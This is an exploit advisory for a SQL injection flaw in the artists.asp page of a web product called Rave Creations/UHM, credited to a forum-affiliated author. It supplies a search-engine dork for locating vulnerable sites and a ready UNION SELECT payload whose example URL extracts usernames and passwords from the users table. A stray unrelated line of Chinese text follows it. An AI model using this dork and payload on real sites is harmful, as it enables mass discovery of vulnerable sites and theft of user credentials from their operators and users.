************************************************************ **(artists.asp) SQL Injection Vulnerability ************************************************************ **Prodcut:Rave Creations/UHM **Home : N/A **Vunlerability :SQL Injection **Risk:High **Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010" ************************************************************ ** Discovred by:Ra3cH ** From :Algeria ** Contact : e51@hotmail.fr ** ********************************************************* ** Greetz to : ALLAH ** All Members ofhttp://www.DZ4All.cOm/Cc **And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & ..... ************************************************************ **Exploit: ** **http://[PATH]/artists.asp?id=(SQL) ** **SQL=union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users ** ************************************************************ **Exemple: ** ** **http://[site]/artists.asp?id=24%20union%20select%201,username,userpass,4,5,6,7,8,9,10,11,12,13%20from%20users ** ***********************************************************
体验盒子